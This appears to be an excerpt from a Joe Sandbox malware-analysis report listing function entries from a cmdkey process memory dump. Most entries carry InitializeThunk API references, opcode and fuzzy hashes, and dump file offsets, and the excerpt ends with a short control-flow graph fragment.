                                                                • Instruction ID: f2e62e0345d0a8d82b8e39335a8a1045de77a9e49c2d95bc8d94d5ff1ab2bf6a
                                                                • Opcode Fuzzy Hash: 9c513eafea19e212686e57a6e679e6276b6313a6f199c2cd6f68de667cf9f15e
                                                                • Instruction Fuzzy Hash: BFE046B2600214BBD220AA69EC02F9BB76DDBC5B24F418019FA08A7241C771B92186A0
                                                                Function 03514340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: bc9913cf7f1f619569c699a8c263d4c487245c50e7890eb6cad0cb6bcfcbff6b
                                                                • Instruction ID: 9e979f27f8ebb7975f967d315a00e2a5a3fe129e66b9565035b916ac379393bb
                                                                • Opcode Fuzzy Hash: bc9913cf7f1f619569c699a8c263d4c487245c50e7890eb6cad0cb6bcfcbff6b
                                                                • Instruction Fuzzy Hash: 57900232705814129140B19858855464445A7E1311B5AC011E4424559C8F148A565361
                                                                Function 03514650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: c6922bc963192664e136e99282ff776879ae0a05301477f9f854a77586b6be8c
                                                                • Instruction ID: 7c4dc267545637bda8b0c87a3be741f7b41927d93f966ed2dfbebbf2a80b76f3
                                                                • Opcode Fuzzy Hash: c6922bc963192664e136e99282ff776879ae0a05301477f9f854a77586b6be8c
                                                                • Instruction Fuzzy Hash: 71900262701514424140B19858054066445A7E231139AC115A4554565C8B1889559269
                                                                Function 03512B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 13dc839547a7dd4357ea0e01606b95a0036ce002c70a9c3ec17355c5fec97bf2
                                                                • Instruction ID: 42330e501d6635aa95763df37633a54963ad49b196f03ad7a1f0b8712f90b511
                                                                • Opcode Fuzzy Hash: 13dc839547a7dd4357ea0e01606b95a0036ce002c70a9c3ec17355c5fec97bf2
                                                                • Instruction Fuzzy Hash: A6900262302414034105B1985415616444A97E1211B5AC021E5014595DCB2589916125
                                                                Function 03512BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: b3dae6e31c3a46e594e83e4c30fdeaa9ba5ea508b14f9a159f1d8902aeec46fb
                                                                • Instruction ID: 8ad631cbd927e15353f2638f249278c87e37c7fb43d32e1fe89029b58a3e4554
                                                                • Opcode Fuzzy Hash: b3dae6e31c3a46e594e83e4c30fdeaa9ba5ea508b14f9a159f1d8902aeec46fb
                                                                • Instruction Fuzzy Hash: F190023230141C02D180B198540564A044597D2311F9AC015A4025659DCF158B5977A1
                                                                Function 03512BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 9017887fd082b97ff7ec8db12320ce5faa53f203a447cf9bd2c8b9e7770ac386
                                                                • Instruction ID: 03a73d3e07b2ed767b08d8d27e8d1094042aab007ca8cb46c506497cf058a076
                                                                • Opcode Fuzzy Hash: 9017887fd082b97ff7ec8db12320ce5faa53f203a447cf9bd2c8b9e7770ac386
                                                                • Instruction Fuzzy Hash: 2890023230545C42D140B1985405A46045597D1315F5AC011A4064699D9B258E55B661
                                                                Function 03512BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: fa0fb69c2a77b0f11aef2525db08a6c7dfb8613716bdb791f6fa3266fe6d2fac
                                                                • Instruction ID: b63af59433f6e1951ad010ee2f50fb444bf8a2a4ad048a662f5ad93638d6f4c2
                                                                • Opcode Fuzzy Hash: fa0fb69c2a77b0f11aef2525db08a6c7dfb8613716bdb791f6fa3266fe6d2fac
                                                                • Instruction Fuzzy Hash: D090023270541C02D150B1985415746044597D1311F5AC011A4024659D8B558B5576A1
                                                                Function 03512AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 14cfc1bfaa163484f92fc9134961bf134014051a7cf57b5791eb9c757c6b888d
                                                                • Instruction ID: fb3583f7c2e72c311b621d5e2a9e7342b05530cd4d84919029de51cec8949958
                                                                • Opcode Fuzzy Hash: 14cfc1bfaa163484f92fc9134961bf134014051a7cf57b5791eb9c757c6b888d
                                                                • Instruction Fuzzy Hash: 04900226311414030105F5981705507048697D636135AC021F5015555CDB2189615121
                                                                Function 03512AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: a00dc7d82efbf08522202f65819964aa52ed8a7c890dd55e1176be3e55c2a712
                                                                • Instruction ID: 634f17cb4174c741594594a82c5a4a43ffdfe30191a2261223c7ffdae834ea4f
                                                                • Opcode Fuzzy Hash: a00dc7d82efbf08522202f65819964aa52ed8a7c890dd55e1176be3e55c2a712
                                                                • Instruction Fuzzy Hash: 06900226321414020145F598160550B0885A7D736139AC015F5416595CCB2189655321
                                                                Function 03512F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 6302c1d2792b2132c07bc481f00c2e59ff0cb77bfb499ec10fab90855045d643
                                                                • Instruction ID: 8e17b0a9a40f824c095fc98f06bfd0d33a21d161d062e678e94d230f3dcbb0b0
                                                                • Opcode Fuzzy Hash: 6302c1d2792b2132c07bc481f00c2e59ff0cb77bfb499ec10fab90855045d643
                                                                • Instruction Fuzzy Hash: 9490026234141842D100B1985415B060445D7E2311F5AC015E5064559D8B19CD526126
                                                                Function 03512FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: dc3379f7f050cd2a794792e296d577cf9731ee53cea8d6c799af4b2573d81f9f
                                                                • Instruction ID: f08ab3164ee44c7f8fca29301ce4d8b7f61266f6da14fadba684075b1c40e183
                                                                • Opcode Fuzzy Hash: dc3379f7f050cd2a794792e296d577cf9731ee53cea8d6c799af4b2573d81f9f
                                                                • Instruction Fuzzy Hash: C7900222311C1442D200B5A85C15B07044597D1313F5AC115A4154559CCF1589615521
                                                                Function 03512FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 19229ee097a265c8364129e2bfc7bb7a80f8260d7625b76d09494e3ebd84cdb3
                                                                • Instruction ID: c4d8a33a219ecd89e1e4efef92fb6ca707ceeea1e61d35e1e836868a977529a4
                                                                • Opcode Fuzzy Hash: 19229ee097a265c8364129e2bfc7bb7a80f8260d7625b76d09494e3ebd84cdb3
                                                                • Instruction Fuzzy Hash: 6F900222701414424140B1A898459064445BBE222175AC121A4998555D8B5989655665
                                                                Function 03512EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: e990568c89b094a8edc4fda981fba999e7c8c4e51ed56fe75e24f19cd4af95f1
                                                                • Instruction ID: 26b01538aa0e3263b05b163816d52ec0bc80f9776785b7e1c2972b0c5a7e3778
                                                                • Opcode Fuzzy Hash: e990568c89b094a8edc4fda981fba999e7c8c4e51ed56fe75e24f19cd4af95f1
                                                                • Instruction Fuzzy Hash: 0090026230181803D140B5985805607044597D1312F5AC011A606455AE8F298D516135
                                                                Function 03512E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: c5f709681e3fb6cc6f58410e1900e5ecabee87e4fa15063ccce21c456ef07cb5
                                                                • Instruction ID: 9f5be509885e67dea9a96630bd6007299121a35e791381e747154652ed0cacb5
                                                                • Opcode Fuzzy Hash: c5f709681e3fb6cc6f58410e1900e5ecabee87e4fa15063ccce21c456ef07cb5
                                                                • Instruction Fuzzy Hash: AD90022270141902D101B1985405616044A97D1251F9AC022A502455AECF258A92A131
                                                                Function 03512D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: dabb293a1383832a829079d1f4809ca6839fd2e72f7cca730cf868861cae4c8d
                                                                • Instruction ID: dd6199dc2ae5023090d03369ff0f7021d0e6335e83681efea4281c2f037b2268
                                                                • Opcode Fuzzy Hash: dabb293a1383832a829079d1f4809ca6839fd2e72f7cca730cf868861cae4c8d
                                                                • Instruction Fuzzy Hash: 1590022A31341402D180B198640960A044597D2212F9AD415A401555DCCF1589695321
                                                                Function 03512D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: ab5a4b677f83a622d7272a7679902844a4f91e1d6e9d9ee898510743a5fa91f6
                                                                • Instruction ID: 112999f1d8a50d7bbd3c658f643c75cf5fb7ec328b473608c71e6cffaeed06be
                                                                • Opcode Fuzzy Hash: ab5a4b677f83a622d7272a7679902844a4f91e1d6e9d9ee898510743a5fa91f6
                                                                • Instruction Fuzzy Hash: 5C90022230141403D140B19864196064445E7E2311F5AD011E4414559CDF1589565222
                                                                Function 03512DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 86d437dfdaa4c73b1ce679e7ee33ac5b2fa6ce17887c11bb6f8340ea94353f98
                                                                • Instruction ID: 80abd68c1d2dfeeaa9afbbd7b78adfe926aaf6ff0c44af879076e5cd36a2103f
                                                                • Opcode Fuzzy Hash: 86d437dfdaa4c73b1ce679e7ee33ac5b2fa6ce17887c11bb6f8340ea94353f98
                                                                • Instruction Fuzzy Hash: DB900222342455525545F19854055074446A7E125179AC012A5414955C8B269956D621
                                                                Function 03512DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: c152915e7b597635b5b5d0d62e588b67f4c1c2524f2d64a642d91b1cb08f878e
                                                                • Instruction ID: 2130019260dbdeec5443d2c8512d1c01ca39d2303115873fbf0c41cd4b9b0fc3
                                                                • Opcode Fuzzy Hash: c152915e7b597635b5b5d0d62e588b67f4c1c2524f2d64a642d91b1cb08f878e
                                                                • Instruction Fuzzy Hash: 9090023230141813D111B1985505707044997D1251F9AC412A442455DD9B568A52A121
                                                                Function 03512C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 364f0661155fc88b204752dc007dd1ebcca1920f215ad7d8ec1c83c7b96620b4
                                                                • Instruction ID: 078678a9a89d48917cb98f06389301cbcf74013310a0c89a0272b560b48dfd1b
                                                                • Opcode Fuzzy Hash: 364f0661155fc88b204752dc007dd1ebcca1920f215ad7d8ec1c83c7b96620b4
                                                                • Instruction Fuzzy Hash: 9990023230149C02D110B198940574A044597D1311F5EC411A842465DD8B9589917121
                                                                Function 03512C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: f2b3d70fc960ced24cfbff889439dab2142ede1c0911fb1785a575097d8bdf33
                                                                • Instruction ID: 35aa13b3cdf49b1649b7e3352c2480c1371982c5134f007cae64d29ffaeae06c
                                                                • Opcode Fuzzy Hash: f2b3d70fc960ced24cfbff889439dab2142ede1c0911fb1785a575097d8bdf33
                                                                • Instruction Fuzzy Hash: 0990023230141C42D100B1985405B46044597E1311F5AC016A4124659D8B15C9517521
                                                                Function 03512CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 0215692590f2d1b555fadd20393fa09303d378bb93681ee56e714be8c22f7499
                                                                • Instruction ID: a919e8e9789e651b54438be4715501553e634a6a70695fc240d71b368a3c175e
                                                                • Opcode Fuzzy Hash: 0215692590f2d1b555fadd20393fa09303d378bb93681ee56e714be8c22f7499
                                                                • Instruction Fuzzy Hash: 9190023230141802D100B5D86409646044597E1311F5AD011A902455AECB6589916131
                                                                Function 035135C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: a0f7a211caf405345c4d76949a9b101aca04f2ba17c7b6819ce826e72d0e9d51
                                                                • Instruction ID: 5dced26a70488409ed2d395aaff6c8cd2e17e39c1cab15208c3087d3d8222f73
                                                                • Opcode Fuzzy Hash: a0f7a211caf405345c4d76949a9b101aca04f2ba17c7b6819ce826e72d0e9d51
                                                                • Instruction Fuzzy Hash: CA90023270551802D100B1985515706144597D1211F6AC411A442456DD8B958A5165A2
                                                                Function 035139B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: true
                                                                • Associated: 00000008.00000002.3817247485.00000000035C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.00000000035CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_34a0000_cmdkey.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 1424dc5b92abe01856bc793b995bf37ce85c8c9f9eaa68ac1c44fd23060ea21a
                                                                • Instruction ID: 02bb4c511364c85a71241e360d0273ae6ab7cc24555f6c617bb5726b202f5adf
                                                                • Opcode Fuzzy Hash: 1424dc5b92abe01856bc793b995bf37ce85c8c9f9eaa68ac1c44fd23060ea21a
                                                                • Instruction Fuzzy Hash: 3790022234546502D150B19C54056164445B7E1211F5AC021A4814599D8B5589556221
                                                                Function 00A10742 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69threadwindowCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 545 a10742-a1074a 546 a10716-a1071f 545->546 547 a1074c-a10761 545->547 548 a10774-a1080e call a2b840 call a13f00 call a01410 call a21530 546->548 547->548 558 a10830-a10835 548->558 559 a10810-a10821 PostThreadMessageW 548->559 559->558 560 a10823-a1082d 559->560 560->558
                                                                APIs
